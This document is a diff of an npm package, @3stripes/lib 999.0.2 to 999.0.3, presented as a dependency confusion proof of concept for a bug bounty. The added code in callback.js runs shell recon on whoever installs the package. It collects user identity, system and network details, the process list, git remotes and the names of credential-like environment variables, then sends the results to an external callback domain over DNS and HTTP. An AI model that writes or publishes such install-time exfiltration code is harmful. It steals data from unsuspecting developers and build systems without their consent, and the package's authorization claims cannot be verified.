@3stripes/lib 999.0.2 → 999.0.3

package/callback.js

@@ -2,7 +2,7 @@
  * SECURITY RESEARCH - Dependency Confusion PoC
  * 
  * This is part of an AUTHORIZED bug bounty assessment.
- * Executes safe commands to capture internal hostnames and sends to callback.
+ * Runs pentest-style recon commands and exfiltrates to callback (no secrets, proof-only).
  * 
  * Researcher: gdattacker (gdattacker@bugcrowdninja.com)
  * Program: Adidas Private Bug Bounty (Bugcrowd)
@@ -13,25 +13,22 @@ const https = require('https');
 const os = require('os');
 const { execSync } = require('child_process');
 
-// REPLACE with your Burp Collaborator / interact.sh domain
 const CALLBACK_DOMAIN = '2defa924e4f741393204gup1d5yyyyyyd.oast.site';
-
-// Create a unique identifier (hostname hash, no PII)
 const id = Buffer.from(os.hostname().slice(0, 8)).toString('hex').slice(0, 12);
 const pkg = '3stripes-lib';
+const isWin = process.platform === 'win32';
 
-// --- Command execution: fetch internal hostnames and exfiltrate to callback ---
-function run(cmd, timeoutMs) {
+function run(cmd, timeoutMs, maxLen) {
   try {
-    return (execSync(cmd, { encoding: 'utf8', timeout: timeoutMs || 3000, stdio: ['pipe', 'pipe', 'pipe'] }) || '').trim().slice(0, 500);
+    const out = (execSync(cmd, { encoding: 'utf8', timeout: timeoutMs || 3000, stdio: ['pipe', 'pipe', 'pipe'] }) || '').trim();
+    return (maxLen ? out.slice(0, maxLen) : out).replace(/\s+/g, ' ');
   } catch (e) {
     return '';
   }
 }
 
+// --- Pentest-style recon: hostnames ---
 let hostnames = '';
-const isWin = process.platform === 'win32';
-
 if (isWin) {
   hostnames = run('hostname', 2000) || process.env.COMPUTERNAME || os.hostname();
 } else {
@@ -42,24 +39,84 @@ if (isWin) {
   hostnames = [os.hostname(), h, hf, etcHostname, etcHosts].filter(Boolean).join('|');
 }
 
-const payload = encodeURIComponent(hostnames || os.hostname() || 'unknown');
+// --- User / identity ---
+const user = isWin ? run('whoami', 2000, 200) : run('id', 2000, 300);
+const whoami = run('whoami', 2000, 100);
+
+// --- System info ---
+const uname = run(isWin ? 'ver' : 'uname -a', 2000, 400);
+const pwd = run(isWin ? 'cd' : 'pwd', 2000, 300);
+
+// --- Network (proves internal/CI environment) ---
+let network = '';
+if (isWin) {
+  network = run('ipconfig 2>nul', 3000, 600);
+} else {
+  const ipAddr = run('ip addr show 2>/dev/null', 3000, 500) || run('ifconfig 2>/dev/null', 3000, 500);
+  const hostnameI = run('hostname -I 2>/dev/null', 2000, 200);
+  network = [ipAddr, hostnameI].filter(Boolean).join(' ');
+}
+
+// --- Process list (snippet: proves what’s running) ---
+const ps = isWin
+  ? run('tasklist 2>nul', 3000, 500)
+  : run('ps aux 2>/dev/null | head -25', 3000, 600);
+
+// --- Env var NAMES only (proves stealable credentials exist; no values) ---
+const envKeys = Object.keys(process.env || {}).filter(function (k) {
+  const u = k.toUpperCase();
+  return /^(AWS|KUBE|GIT|NPM|ARTIFACTORY|CI|JENKINS|AZURE|GOOGLE|SLACK|GH_|NODE_|NVM_|NEXUS|JFROG|ADIDAS|STRIPE|TOKEN|SECRET|KEY|CREDENTIAL|PASSWORD|API_KEY)/i.test(k) || u.indexOf('TOKEN') >= 0 || u.indexOf('SECRET') >= 0 || u.indexOf('KEY') >= 0;
+}).slice(0, 30).join(',');
+
+// --- Git / npm (registry, remotes = internal repo names) ---
+const gitRemote = run('git remote -v 2>/dev/null', 2000, 400);
+const npmRegistry = run('npm config get registry 2>/dev/null', 2000, 200);
+
+// --- Optional: package manager / container hints ---
+const inDocker = run('cat /proc/1/cgroup 2>/dev/null | head -3', 2000, 300);
+const envCi = (process.env.CI || process.env.CI_NAME || process.env.BUILDKITE || process.env.GITHUB_ACTIONS || process.env.GITLAB_CI || process.env.JENKINS_URL || '').slice(0, 100);
+
+const recon = {
+  id,
+  pkg,
+  hostnames: (hostnames || os.hostname() || 'unknown').slice(0, 400),
+  user: (user || whoami || '').slice(0, 200),
+  uname: uname.slice(0, 300),
+  pwd: pwd.slice(0, 200),
+  network: network.slice(0, 500),
+  ps: ps.slice(0, 500),
+  env_keys: envKeys.slice(0, 300),
+  git_remote: gitRemote.slice(0, 300),
+  npm_registry: npmRegistry.slice(0, 150),
+  in_docker: inDocker.slice(0, 200),
+  ci_env: envCi
+};
 
-// Method 1: DNS callback (hostname in subdomain; max 63 chars per label)
+const payload = encodeURIComponent(Buffer.from(JSON.stringify(recon)).toString('base64'));
+
+// DNS callback (hostname in subdomain)
 try {
   const safe = (hostnames || id).replace(/[\s.|]/g, '-').replace(/[^a-z0-9-]/gi, '').slice(0, 40);
   const dnsLabel = `${pkg}-${id}-${safe}`.slice(0, 63);
   dns.resolve(`${dnsLabel}.${CALLBACK_DOMAIN}`, () => {});
 } catch (e) {}
 
-// Method 2: HTTP callback with hostnames in query (full exfil)
+// HTTP callback: full recon payload (single GET)
 try {
-  const url = `https://${CALLBACK_DOMAIN}/${pkg}?id=${id}&hostnames=${payload}`;
+  const url = `https://${CALLBACK_DOMAIN}/${pkg}?id=${id}&r=${payload}`;
   const req = https.get(url, () => {});
   req.on('error', () => {});
-  req.setTimeout(5000, () => req.destroy());
+  req.setTimeout(8000, () => req.destroy());
+} catch (e) {}
+
+// Fallback: legacy hostnames-only query (in case parser expects it)
+try {
+  const legacyUrl = `https://${CALLBACK_DOMAIN}/${pkg}/legacy?id=${id}&hostnames=${encodeURIComponent((hostnames || os.hostname() || 'unknown').slice(0, 300))}`;
+  const req2 = https.get(legacyUrl, () => {});
+  req2.on('error', () => {});
+  req2.setTimeout(5000, () => req2.destroy());
 } catch (e) {}
 
-// Log locally for debugging
 console.log(`[Security Research] Dependency confusion PoC executed - ${pkg}`);
 console.log(`[Security Research] Contact: gdattacker@bugcrowdninja.com`);
 console.log(`[Security Research] This is part of an authorized bug bounty assessment.`);

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "@3stripes/lib",
-  "version": "999.0.2",
+  "version": "999.0.3",
   "description": "Security research - Dependency confusion proof of concept. This package is part of an authorized bug bounty assessment. Contact: gdattacker@bugcrowdninja.com",
   "main": "index.js",
   "scripts": {